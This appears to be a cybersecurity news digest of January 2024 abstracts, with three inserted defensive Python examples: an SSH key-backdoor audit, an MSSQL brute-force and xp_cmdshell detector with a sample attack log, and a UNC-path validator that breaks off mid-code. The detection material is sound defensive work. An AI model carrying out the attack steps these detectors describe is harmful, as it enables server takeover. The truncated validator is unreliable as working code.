Abstract A 29-year-old Ukrainian national has been arrested in connection with running a "sophisticated cryptojacking scheme," netting them over $2 million (€1.8 million) in illicit profits. The person, described as the "mastermind" behind the operation, was apprehended in Mykolaiv, Ukraine, on January 9 by the National Police of Ukraine with support from Europol and an unnamed cloud service provider following "months of intensive collaboration." "A cloud provider approached Europol back in January 2023 with information regarding compromised cloud user accounts of theirs," Europol said, adding it shared the intelligence with the Ukrainian authorities. As part of the probe, three properties were searched to unearth evidence against the suspect. Cryptojacking refers to a type of cyber crime that entails the unauthorized use of a person's or organization's computing resources to mine cryptocurrencies. On the cloud, such attacks are typically carried out by infiltrating the infrastructur

The Hacker News

January 13, 2024 – Criminals

Medusa Ransomware Gang Targets Nonprofit Providing Clean Water to World’s Poorest Full Text

Abstract Water for People, a nonprofit focused on improving access to clean water, has been targeted by the Medusa ransomware group, highlighting the vulnerability of even non-profit organizations to cyberattacks.

Cyware

January 13, 2024 – General

APIs are Increasingly Becoming Attractive Targets Full Text

Abstract APIs are being used more than ever by businesses to build and provide better sites, apps, and services to consumers. However, if APIs are not managed or secured properly, they can be exploited by hackers to steal sensitive information.

Cyware

January 13, 2024 – Hacker

Volt Typhoon Ramps Up Malicious Activity Against Critical Infrastructure Full Text

Abstract Volt Typhoon is using compromised routers as a command-and-control network and deploying a new web shell called "fy.sh" on targeted Cisco routers, indicating a highly active and sophisticated operation.

Cyware

January 13, 2024 – Vulnerabilities

Vulnerability Affecting Smart Thermostats Patched by Bosch Full Text

Abstract German technology manufacturer Bosch has fixed a vulnerability in its popular line of smart thermostats that allowed attackers to replace the device firmware with a rogue version.

Cyware

January 13, 2024 – Solution

Purple Teaming and the Role of Threat Categorization Full Text

Abstract Purple team assessments, where red and blue teams collaborate, can provide a more comprehensive approach to security assessments, but they need to evolve to account for the multitude of attack technique variants.

Cyware

January 13, 2024 – Breach

Update: Ransomware Attack on US Navy Shipbuilder Leaked Information of Nearly 17,000 People Full Text

Abstract Nearly 17,000 people had their personal information exposed in a ransomware attack on Fincantieri Marine Group. The attack, which occurred in April 2023, caused production issues and disrupted the company's computer systems.

Cyware

January 13, 2024 – Breach

Saudi Foreign Affairs Ministry Allegedly Hit by Major Data Breach, Impacting Over 1.4 Million Employees Full Text

Abstract The Ministry of Foreign Affairs for Saudi Arabia reportedly experienced a major data breach, exposing the personal information of over 1.4 million employees, including names, contact details, and job titles.

Cyware

January 12, 2024 – Attack

Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families Full Text

Abstract As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023. "These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an analysis published this week. The Google-owned threat intelligence firm is tracking the threat actor under the moniker UNC5221. The attacks leverage an exploit chain comprising an authentication bypass flaw (CVE-2023-46805) and a code injection vulnerability (CVE-2024-21887) to take over susceptible instances. Volexity, which attributed the activity to a suspected Chinese espionage actor named UTA0178, said the twin flaws were used to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment. Ac

The Hacker News

January 12, 2024 – Ransomware

Medusa Ransomware on the Rise: From Data Leaks to Multi-Extortion Full Text

Abstract The threat actors associated with the Medusa ransomware have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims who are unwilling to agree to their demands. "As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their leak site, such as time extension, data deletion or download of all the data," Palo Alto Networks Unit 42 researchers Anthony Galiette and Doel Santos said in a report shared with The Hacker News. "All of these options have a price tag depending on the organization impacted by this group." Medusa (not to be confused with Medusa Locker) refers to a ransomware family that appeared in late 2022 before coming into prominence in 2023. It's known for opportunistically targeting a wide range of industries such as high technology, education, manufacturing, healthcare, and retail. As many as 74 organization

The Hacker News

January 12, 2024 – Solution

Applying the Tyson Principle to Cybersecurity: Why Attack Simulation is Key to Avoiding a KO Full Text

Abstract Picture a cybersecurity landscape where defenses are impenetrable, and threats are nothing more than mere disturbances deflected by a strong shield. Sadly, this image of fortitude remains a pipe dream despite its comforting nature. In the security world, preparedness is not just a luxury but a necessity. In this context, Mike Tyson's famous adage, "Everyone has a plan until they get punched in the face," lends itself to our arena - cyber defenses must be battle-tested to stand a chance. Tyson's words capture the paradox of readiness in cybersecurity: too often, untested cyber defenses can create a false sense of security, leading to dire consequences when real threats land a blow. This is where Breach and Attack Simulation (BAS), a proactive tool in any organization's cybersecurity arsenal, comes into play. When Cybersecurity Meets the Punch - The Assumption Problem Assumptions are the hidden icebergs in cybersecurity's vast ocean. Although we might believ

The Hacker News

January 11, 2024 – Business

Chertoff Group Affiliate Completes Trustwave Acquisition Full Text

Abstract MC2 Security Fund has completed its acquisition of Trustwave, a managed security services provider, expanding its reach and placing Trustwave in front of Chertoff Group customers in the commercial and public sectors.

Cyware

January 11, 2024 – General

Threat Actors Increasingly Abusing GitHub for Malicious Purposes Full Text

Abstract The ubiquity of GitHub in information technology (IT) environments has made it a lucrative choice for threat actors to host and deliver malicious payloads and act as dead drop resolvers, command-and-control, and data exfiltration points. "Using GitHub services for malicious infrastructure allows adversaries to blend in with legitimate network traffic, often bypassing traditional security defenses and making upstream infrastructure tracking and actor attribution more difficult," Recorded Future said in a report shared with The Hacker News. The cybersecurity firm described the approach as "living-off-trusted-sites" (LOTS), a spin on the living-off-the-land (LotL) techniques often adopted by threat actors to conceal rogue activity and fly under the radar. Prominent among the methods by which GitHub is abused is payload delivery, with some actors leveraging its features for command-and-control (C2) obfuscation. Last month, ReversingLabs detailed a number of rogue

The Hacker News

January 11, 2024 – Phishing

Black Basta-Affiliate Spreads Pikabot Full Text

Abstract Threat group Water Curupira, known for its Cobalt Strike backdoors, recently transitioned to using Pikabot malware in phishing campaigns. Pikabot witnessed a surge in activity in Q4 2023, potentially serving as a replacement for Qakbot after its takedown. Users must exercise caution with email atta

Cyware

January 11, 2024 – Vulnerabilities

New PoC Exploit for Apache OFBiz Vulnerability Poses Risk to ERP Systems Full Text

Abstract Cybersecurity researchers have developed proof-of-concept (PoC) code that exploits a recently disclosed critical flaw in the Apache OFBiz open-source Enterprise Resource Planning (ERP) system to execute a memory-resident payload. The vulnerability in question is CVE-2023-51467 (CVSS score: 9.8), a bypass for another severe shortcoming in the same software (CVE-2023-49070, CVSS score: 9.8) that could be weaponized to bypass authentication and remotely execute arbitrary code. While it was fixed in Apache OFBiz version 18.12.11 released last month, threat actors have been observed attempting to exploit the flaw, targeting vulnerable instances. The latest findings from VulnCheck show that CVE-2023-51467 can be exploited to execute a payload directly from memory, leaving little to no traces of malicious activity. Security flaws disclosed in Apache OFBiz (e.g., CVE-2020-9496) have been exploited by threat actors in the past, including by threat actors associated with th

The Hacker News

January 11, 2024 – Breach

HMG Healthcare Discloses Data Breach Affecting 40 Affiliated Nursing Facilities Full Text

Abstract The breach occurred in August 2023 when threat actors gained unauthorized access to a company server and stole unencrypted files containing medical records, personal information, and employment records.

Cyware

January 11, 2024 – Malware

New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms Full Text

Abstract A new Python-based hacking tool called FBot has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio. "Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. FBot is the latest addition to the list of cloud hacking tools like AlienFox, GreenBot (aka Maintance), Legion, and Predator, all four of which share code-level overlaps with AndroxGh0st. SentinelOne described FBot as "related but distinct from these families," owing to the fact that it does not reference any source code from AndroxGh0st, although it exhibits similarities with Legion, which first came to light last year. The end goal of the tool is to hijack cloud, SaaS, and

The Hacker News

January 11, 2024 – Law Article

French Hacker From ‘ShinyHunters’ Group Sentenced to Three Years in US Prison Full Text

Abstract A 22-year-old French hacker has been sentenced to three years in U.S. federal prison for his involvement in the ShinyHunters hacking group and must pay $5 million in restitution.

Cyware

January 11, 2024 – General

There is a Ransomware Armageddon Coming for Us All Full Text

Abstract Generative AI will enable anyone to launch sophisticated phishing attacks that only next-generation MFA devices can stop. The least surprising headline from 2023 is that ransomware again set new records for the number of incidents and the damage inflicted. We saw new headlines every week, which included a who's-who of big-name organizations. If MGM, Johnson Controls, Clorox, Hanes Brands, Caesars Palace, and so many others cannot stop the attacks, how will anyone else? Phishing-driven ransomware is the cyber threat that looms larger and more dangerous than all others. CISA and Cisco report that 90% of data breaches are the result of phishing attacks and monetary losses that exceed $10 billion in total. A report from Splunk revealed that 96 percent of companies fell victim to at least one phishing attack in the last 12 months and 83 percent suffered two or more. Protect your organization from phishing and ransomware by learning about the benefits of Next-Generation MFA. Download th

The Hacker News

January 11, 2024 – Breach

Thousands of WordPress Sites with Popup Builder Plugin Compromised by Balada Injector Full Text

Abstract A stored XSS flaw in the Popup Builder WordPress plugin has been exploited by the Balada Injector campaign. The campaign injects malicious code into websites using older versions of the plugin, with over 6,200 sites currently affected.

Cyware

January 11, 2024 – Malware

Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload Full Text

Abstract Cybersecurity researchers have identified an updated version of a macOS information stealer called Atomic (or AMOS), indicating that the threat actors behind the malware are actively enhancing its capabilities. "It looks like Atomic Stealer was updated around mid to late December 2023, where its developers introduced payload encryption in an effort to bypass detection rules," Malwarebytes' Jérôme Segura said in a Wednesday report. Atomic Stealer first emerged in April 2023 for a monthly subscription of $1,000. It's capable of harvesting sensitive information from a compromised host, including Keychain passwords, session cookies, files, crypto wallets, system metadata, and the machine's password via a fake prompt. Over the past several months, the malware has been observed propagated via malvertising and compromised sites under the guise of legitimate software and web browser updates. Malwarebytes' latest analysis shows that Atomic Stealer is no

The Hacker News

January 11, 2024 – Business

ExtraHop Raises $100M in Growth Capital Full Text

Abstract Seattle-based company ExtraHop has raised $100 million in growth capital for its cloud-native network detection and response platform. The funding will be used to expand operations and business reach.

Cyware

January 11, 2024 – Breach

Mandiant’s X Account Was Hacked Using Brute-Force Attack Full Text

Abstract The compromise of Mandiant's X (formerly Twitter) account last week was likely the result of a "brute-force password attack," with the company attributing the hack to a drainer-as-a-service (DaaS) group. "Normally, [two-factor authentication] would have mitigated this, but due to some team transitions and a change in X's 2FA policy, we were not adequately protected," the threat intelligence firm said in a post shared on X. The attack, which took place on January 3, 2024, enabled the threat actor to take control of the company's X account and distribute links to a phishing page hosting a cryptocurrency drainer tracked as CLINKSINK. Drainers refer to malicious scripts and smart contracts that facilitate the theft of digital assets from the victim's wallets after they are tricked into approving the transactions. According to the Google-owned subsidiary, multiple threat actors are believed to have leveraged CLINKSINK since December 2023 to siphon funds and tok

The Hacker News

January 11, 2024 – Botnet

New NoaBot Botnet Spreads an Illicit Cryptominer on Linux Systems Full Text

Abstract The malware's obfuscation and custom code suggest mature threat actors, but the inclusion of childish elements complicates attribution, making it difficult to determine the exact nature of the operation.

Cyware

January 10, 2024 – General

Fallout Mounting From Recent Major Health Data Hacks Full Text

Abstract Several high-profile health data hacks, including those affecting medical transcription vendor Perry Johnson and Associates and hospital chain Prospect Medical Holdings, are resulting in growing lists of affected individuals and triggering lawsuits.

Cyware

January 10, 2024 – Botnet

NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining Full Text

Abstract A new Mirai-based botnet called NoaBot has been used by threat actors as part of a crypto mining campaign since the beginning of 2023. "The capabilities of the new botnet, NoaBot, include a wormable self-spreader and an SSH key backdoor to download and execute additional binaries or spread itself to new victims," Akamai security researcher Stiv Kupchik said in a report shared with The Hacker News. Mirai, which had its source code leaked in 2016, has been the progenitor of a number of botnets, the most recent being InfectedSlurs, which is capable of mounting distributed denial-of-service (DDoS) attacks. There are indications that NoaBot could be linked to another botnet campaign involving a Rust-based malware family known as P2PInfect, which recently received an update to target routers and IoT devices. This is based on the fact that threat actors have also experimented with dropping P2PInfect in place of NoaBot in recent attacks targeting SSH servers, indicating likely at

The Hacker News
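The NoaBot entry above mentions an SSH key backdoor, which in practice means an attacker-controlled public key added to a user's authorized_keys file. The audit below is an added example, not Akamai's tooling or anything from its report: it parses an authorized_keys file (including the options field that can precede the key), computes the SHA256 fingerprint in the form ssh-keygen -lf prints, and reports every entry that is malformed or whose fingerprint is not on an allowlist. The sample file, the key blobs (a valid ssh-ed25519 wire-format prefix plus filler, so they decode but are not real keys) and the allowlist are constructed for the example.

```python
import base64
import hashlib
import re
import shlex
from typing import Dict, List, Set

# Key types accepted in authorized_keys; the first token matching this marks
# the end of the optional options field.
_KEY_TYPE_RE = re.compile(
    r"^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)"
    r"|sk-(ssh-ed25519|ecdsa-sha2-nistp256)@openssh\.com)$"
)


def fingerprint(key_b64: str) -> str:
    """SHA256 fingerprint in the form ssh-keygen -lf prints (SHA256:<base64, no padding>)."""
    blob = base64.b64decode(key_b64)
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[Dict[str, object]]:
    """Split an authorized_keys file into entries: line, options, key_type, fingerprint, comment.

    Malformed lines are kept as entries carrying an "error" field so an audit
    can surface them instead of skipping them.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # shlex keeps quoted option values such as command="/bin/foo bar" together.
        tokens = shlex.split(line)
        idx = next((i for i, t in enumerate(tokens) if _KEY_TYPE_RE.match(t)), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"line": lineno, "error": "no key type/blob found", "raw": raw})
            continue
        try:
            fp = fingerprint(tokens[idx + 1])
        except ValueError:  # binascii.Error is a ValueError
            entries.append({"line": lineno, "error": "key blob is not valid base64", "raw": raw})
            continue
        entries.append({
            "line": lineno,
            "options": " ".join(tokens[:idx]),
            "key_type": tokens[idx],
            "fingerprint": fp,
            "comment": " ".join(tokens[idx + 2:]),
        })
    return entries


def audit(text: str, allowlist: Set[str]) -> List[Dict[str, object]]:
    """Return entries that are malformed or whose fingerprint is not in the allowlist."""
    return [e for e in parse_authorized_keys(text)
            if "error" in e or e["fingerprint"] not in allowlist]


# Constructed key blobs: a valid ssh-ed25519 wire-format prefix followed by
# filler, so they decode cleanly but are not real keys.
_ED25519_PREFIX = "AAAAC3NzaC1lZDI1NTE5AAAAI"
KEY_OPS = _ED25519_PREFIX + "A" * 43
KEY_BACKUP = _ED25519_PREFIX + "B" * 43
KEY_UNKNOWN = _ED25519_PREFIX + "C" * 43

# Constructed authorized_keys content; line 4 is the kind of unlabelled extra
# key a backdoor leaves behind.
SAMPLE_AUTHORIZED_KEYS = f"""\
# keys below this line are managed by configuration management
ssh-ed25519 {KEY_OPS} ops@bastion
command="/usr/bin/rrsync /srv/backup",no-pty ssh-ed25519 {KEY_BACKUP} backup@nas
ssh-ed25519 {KEY_UNKNOWN}
"""

# In production this set comes from your key inventory; here it is built from
# the two keys that are supposed to be present.
ALLOWLIST = {fingerprint(KEY_OPS), fingerprint(KEY_BACKUP)}

if __name__ == "__main__":
    for finding in audit(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(finding)
```

Run it over every authorized_keys file on a host (root's, service accounts', and any AuthorizedKeysFile path set in sshd_config), not just the interactive users' ones; the fingerprints it emits can be compared directly with `ssh-keygen -lf` output.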

January 10, 2024 – General

DDoS Attack Traffic Surged in 2023, Cloudflare Finds Full Text

Abstract Distributed denial of service (DDoS) attacks reached an all-time high in 2023, with a significant increase in the number and intensity of attacks, driven by the exploitation of vulnerabilities like the HTTP/2 Rapid Reset.

Cyware

January 10, 2024 – General

Getting off the Attack Surface Hamster Wheel: Identity Can Help Full Text

Abstract IT professionals have developed a sophisticated understanding of the enterprise attack surface – what it is, how to quantify it and how to manage it.  The process is simple: begin by thoroughly assessing the attack surface, encompassing the entire IT environment. Identify all potential entry and exit points where unauthorized access could occur. Strengthen these vulnerable points using available market tools and expertise to achieve the desired cybersecurity posture.  While conceptually straightforward, this is an incredibly tedious task that consumes the working hours of CISOs and their organizations. Both the enumeration and the fortification pose challenges: large organizations use a vast array of technologies, such as server and endpoint platforms, network devices, and business apps. Reinforcing each of these components becomes a frustrating exercise in integration with access control, logging, patching, monitoring, and more, creating a seemingly endless list of tasks.  However

The Hacker News

January 10, 2024 – Phishing

Meet Ika & Sal: The Bulletproof Hosting Duo from Hell Full Text

Abstract Two Russian men, known as Icamis and Salomon, co-ran the top spam forum Spamdot and worked closely with dangerous cybercriminals, controlling botnets and harvesting passwords.

Cyware

January 10, 2024 – Ransomware

Free Decryptor Released for Black Basta and Babuk’s Tortilla Ransomware Victims Full Text

Abstract A decryptor for the Tortilla variant of the Babuk ransomware has been released by Cisco Talos, allowing victims targeted by the malware to regain access to their files. The cybersecurity firm said the threat intelligence it shared with Dutch law enforcement authorities made it possible to arrest the threat actor behind the operations. The encryption key has also been shared with Avast, which had previously released a decryptor for Babuk ransomware after its source code was leaked in September 2021. The updated decryptor can be accessed here [EXE file]. "A single private key is used for all victims of the Tortilla threat actor," Avast noted. "This makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files." The Tortilla campaign was first disclosed by Talos in November 2021, with the attacks leveraging ProxyShell flaws in Microsoft Exchange servers to drop the ransomware within victim environments. Tortilla

The Hacker News

January 10, 2024 – Government

DOJ to up Tempo of Cybercrime Operations in 2024, Senior Official Says Full Text

Abstract The US Department of Justice expects an increase in government disruption operations in cybersecurity in 2024, with a focus on dismantling cybercriminal infrastructure and targeting individuals and companies supporting cybercrime.

Cyware

January 10, 2024 – Government

FTC Bans Outlogic (X-Mode) From Selling Sensitive Location Data Full Text

Abstract The U.S. Federal Trade Commission (FTC) on Tuesday prohibited data broker Outlogic, which was previously known as X-Mode Social, from sharing or selling any sensitive location data with third parties. The ban is part of a settlement over allegations that the company "sold precise location data that could be used to track people's visits to sensitive locations such as medical and reproductive health clinics, places of religious worship and domestic abuse shelters." The proposed order also requires it to destroy all the location data it previously gathered unless it obtains consumer consent or ensures the data has been de-identified or rendered non-sensitive, as well as maintain a comprehensive list of sensitive locations and develop a comprehensive privacy program with a data retention schedule to prevent abuse. The FTC accused X-Mode Social and Outlogic of failing to establish adequate safeguards to prevent the misuse of such data by downstream customers. The dev

The Hacker News

January 10, 2024 – Breach

Hacker Claims to Breach Indian ISP Hathway and Leaks Four Million Users’ KYC Data Full Text

Abstract The leaked data includes the personal information of over 41 million Hathway customers, but analysis suggests that the actual number of impacted accounts is around 4 million.

Cyware

January 10, 2024 – Vulnerabilities

Microsoft’s January 2024 Windows Update Patches 48 New Vulnerabilities Full Text

Abstract Microsoft has addressed a total of 48 security flaws spanning its software as part of its Patch Tuesday updates for January 2024. Of the 48 bugs, two are rated Critical and 46 are rated Important in severity. There is no evidence that any of the issues are publicly known or under active attack at the time of release, making it the second consecutive Patch Tuesday with no zero-days. The fixes are in addition to nine security vulnerabilities that have been resolved in the Chromium-based Edge browser since the release of the December 2023 Patch Tuesday updates. This also includes a fix for a zero-day (CVE-2023-7024, CVSS score: 8.8) that Google said has been actively exploited in the wild. The most critical among the flaws patched this month are as follows: CVE-2024-20674 (CVSS score: 9.0), Windows Kerberos Security Feature Bypass Vulnerability; CVE-2024-20700 (CVSS score: 7.5), Windows Hyper-V Remote Code Execution Vulnerability. "The authentication feature could be bypas

The Hacker News

January 10, 2024 – Business

anecdotes Raises $25M in Series B Funding Full Text

Abstract The round was led by Glilot Capital Partners, with participation from existing investors. The company plans to use the funds to introduce new data-driven innovations in the GRC landscape and expand into markets across the US, EMEA, and APAC regions.

Cyware

January 10, 2024 – Government

CISA Flags 6 Vulnerabilities - Apple, Apache, Adobe, D-Link, Joomla Under Attack Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution. It was fixed in version 2.1. Details of the issue first came to light in April 2023, with Horizon3.ai's Naveen Sunkavally describing it as a "dangerous default configuration in Apache Superset that allows an unauthenticated attacker to gain remote code execution, harvest credentials, and compromise data." It's currently not known how the vulnerability is being exploited in the wild. Also added by CISA are five other flaws: CVE-2023-38203 (CVSS score: 9.8), Adobe ColdFusion Deserialization of Untrusted Data Vulnerability; CVE-2023-29300 (CVSS score: 9.8), Adobe ColdFusion Deserialization of Untrus

The Hacker News

January 9, 2024 – Ransomware

New Decryptor for Babuk Tortilla Ransomware Variant Released Full Text

Abstract Cisco Talos, in collaboration with Dutch Police and Avast, recovered a decryptor for the Babuk Tortilla ransomware variant, allowing users to quickly recover their encrypted files.

Cyware

January 09, 2024 – Hacker

Alert: Water Curupira Hackers Actively Distributing PikaBot Loader Malware Full Text

Abstract A threat actor called Water Curupira has been observed actively distributing the PikaBot loader malware as part of spam campaigns in 2023. "PikaBot's operators ran phishing campaigns, targeting victims via its two components — a loader and a core module — which enabled unauthorized remote access and allowed the execution of arbitrary commands through an established connection with their command-and-control (C&C) server," Trend Micro said in a report published today. The activity began in the first quarter of 2023 and lasted until the end of June, before ramping up again in September. It also overlaps with prior campaigns that have used similar tactics to deliver QakBot, specifically those orchestrated by the cybercrime groups known as TA571 and TA577. It's believed that the increase in the number of phishing campaigns related to PikaBot is the result of QakBot's takedown in August, with DarkGate emerging as another replacement. PikaBot is primarily a loader, which means

The Hacker News

January 9, 2024 – Government

US DHS Solicits Synthetic Data Expertise for AI Training Full Text

Abstract The U.S. federal government is seeking synthetic data generators to train machine learning models and test systems in instances where real-world data is unavailable or poses privacy and security risks.

Cyware

January 09, 2024 – Attack

Turkish Hackers Exploiting Poorly Secured MS SQL Servers Across the Globe Full Text

Abstract Poorly secured Microsoft SQL (MS SQL) servers are being targeted in the U.S., European Union, and Latin American (LATAM) regions as part of an ongoing financially motivated campaign to gain initial access. "The analyzed threat campaign appears to end in one of two ways, either the selling of 'access' to the compromised host, or the ultimate delivery of ransomware payloads," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical report shared with The Hacker News. The campaign, linked to actors of Turkish origin, has been codenamed RE#TURGENCE by the cybersecurity firm. Initial access to the servers entails brute-force attacks against the database logins, followed by the use of the xp_cmdshell configuration option to run shell commands on the compromised host. This activity mirrors that of a prior campaign dubbed DB#JAMMER that came to light in September 2023. This stage paves the way for the retrieval of a PowerShell script from a remote server that's responsible f

The Hacker News
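The RE#TURGENCE item above describes a two-step pattern, a password brute force against the SQL Server login followed by enabling xp_cmdshell, that is easy to correlate in the server's own ERRORLOG. The following Python is an added example, not code from the page, Securonix or the campaign; it runs a sliding-window failed-login counter per client IP and escalates any later "xp_cmdshell changed from 0 to 1" event that follows a flagged client. The log lines are constructed to mimic the SQL Server ERRORLOG text format; the thresholds, IP addresses and timings are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines modelled on the SQL Server ERRORLOG format (not real
# log data): six failed 'sa' logins from one client in about a minute, one stray
# failure from another client, then xp_cmdshell being switched on.
SAMPLE_ERRORLOG = """\
2024-01-08 10:15:01.23 Logon       Error: 18456, Severity: 14, State: 8.
2024-01-08 10:15:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:09.80 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:18.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:30.02 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 198.51.100.9]
2024-01-08 10:15:44.17 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:16:02.55 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:16:21.93 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:20:44.10 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-08 10:20:44.12 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

TS = r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+"
LOGIN_FAILED = re.compile(
    TS + r" Logon\s+Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
XP_CMDSHELL_ON = re.compile(
    TS + r" spid\d+\s+Configuration option 'xp_cmdshell' changed from 0 to 1")


def _ts(m):
    return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")


def detect(lines, threshold=5, window=timedelta(minutes=5), follow_up=timedelta(hours=1)):
    """Correlate per-client login failures (sliding window) with a later
    xp_cmdshell enablement. Returns alert dicts in log order."""
    recent_failures = defaultdict(deque)   # client ip -> failure timestamps inside window
    sprayers = {}                          # client ip -> time the threshold was crossed
    alerts = []
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            ts, ip = _ts(m), m["ip"]
            q = recent_failures[ip]
            q.append(ts)
            while ts - q[0] > window:      # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold and ip not in sprayers:
                sprayers[ip] = ts
                alerts.append({"rule": "mssql_bruteforce", "client": ip,
                               "user": m["user"], "failures": len(q), "at": ts})
            continue
        m = XP_CMDSHELL_ON.match(line)
        if m:
            ts = _ts(m)
            # xp_cmdshell is off by default; turning it on shortly after a spray is
            # the RE#TURGENCE/DB#JAMMER hand-off from access to command execution.
            linked = sorted(ip for ip, t in sprayers.items()
                            if timedelta(0) <= ts - t <= follow_up)
            alerts.append({"rule": "xp_cmdshell_enabled", "at": ts,
                           "severity": "critical" if linked else "high",
                           "linked_clients": linked})
    return alerts


def run_sample():
    return detect(SAMPLE_ERRORLOG.splitlines())


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The xp_cmdshell line is worth alerting on by itself (severity "high" here) because legitimate administrators rarely enable it; the failed-login correlation only raises the priority. Tune the threshold and window to the server's normal login-failure rate before deploying.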

January 9, 2024 – Vulnerabilities

High-Severity Vulnerabilities Patched in QNAP QTS, Video Station, QuMagie, Netatalk Products Full Text

Abstract While there is no evidence that the flaws have been exploited in the wild, it's recommended that users take steps to update their installations to the latest version to mitigate potential risks.

Cyware

January 09, 2024 – Education

Why Public Links Expose Your SaaS Attack Surface Full Text

Abstract Collaboration is a powerful selling point for SaaS applications. Microsoft, GitHub, Miro, and others promote the collaborative nature of their software applications that allows users to do more. Links to files, repositories, and boards can be shared with anyone, anywhere. This encourages teamwork that helps create stronger campaigns and projects by encouraging collaboration among employees dispersed across regions and departments. At the same time, the openness of data on SaaS platforms can be problematic. A 2023 survey by the Cloud Security Alliance and Adaptive Shield found that 58% of security incidents over the last two years involved data leakage. Clearly, sharing is good, but data sharing must be kept in check. Most SaaS applications have mechanisms to control sharing. These tools are quite effective in ensuring that company resources aren't open for display on the public web. This article will look at three common data leakage scenarios and recommend best practices for safe sh

The Hacker News

January 9, 2024 – Outage

Online Services Down for German Craft Associations Following ‘Security Incident’ Full Text

Abstract The cyberattack has forced the affected Chambers to disconnect from the network and take their systems offline, causing disruption to vocational training and other online services.

Cyware

January 09, 2024 – Vulnerabilities

Alert: New Vulnerabilities Discovered in QNAP and Kyocera Device Manager Full Text

Abstract A security flaw has been disclosed in Kyocera's Device Manager product that could be exploited by bad actors to carry out malicious activities on affected systems. "This vulnerability allows attackers to coerce authentication attempts to their own resources, such as a malicious SMB share, to capture or relay Active Directory hashed credentials if the 'Restrict NTLM: Outgoing NTLM traffic to remote servers' security policy is not enabled," Trustwave said. The issue is tracked as CVE-2023-50916. Kyocera, in an advisory released late last month, described it as a path traversal issue that enables an attacker to intercept and alter a local path pointing to the backup location of the database, replacing it with a universal naming convention (UNC) path. This, in turn, causes the web application to attempt to authenticate to the rogue UNC path, resulting in unauthorized access to clients' accounts and data theft. Furthermore, depending on the configuration of the environment, it could be exploited to

The Hacker News
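The Kyocera item above is an instance of a general bug: a server-side path that a client can influence is handed to the Windows file API, and a UNC path makes the service authenticate to an attacker's SMB host. The Python below is an added example of the application-level fix, not Kyocera's code or patch; it validates a candidate backup location against a fixed root using ntpath so the Windows rules apply on any host. The root directory, the product name in it and the sample inputs are assumptions.

```python
import ntpath

# Hypothetical backup root; the real product's paths are not given on the page.
DEFAULT_BACKUP_ROOT = r"C:\ProgramData\ExampleDeviceManager\Backup"


def resolve_backup_path(candidate, root=DEFAULT_BACKUP_ROOT):
    """Return the normalised backup path if it stays under `root`; raise ValueError
    otherwise. ntpath (Windows semantics) is used regardless of the host OS."""
    if not isinstance(candidate, str) or not candidate or "\x00" in candidate:
        raise ValueError("empty or malformed path")
    root_n = ntpath.normpath(root)
    # ntpath.join discards `root` when `candidate` is absolute or UNC, and
    # normpath collapses '..' segments and turns '/' into '\', so the checks
    # below see the path the file API would actually open.
    full = ntpath.normpath(ntpath.join(root_n, candidate))
    # \\server\share, //server/share, \\?\ and \\.\ all start with two
    # separators after normalisation: reject them outright so the service never
    # tries to authenticate to a remote host (the NTLM coercion in the report).
    if full.startswith("\\\\"):
        raise ValueError("UNC or device path rejected: " + full)
    drive, _ = ntpath.splitdrive(full)
    if not drive or not ntpath.isabs(full):   # 'D:file' (drive-relative) or no drive
        raise ValueError("path must be absolute under the backup root")
    # Containment check: equal to the root or a descendant of it (Windows paths are
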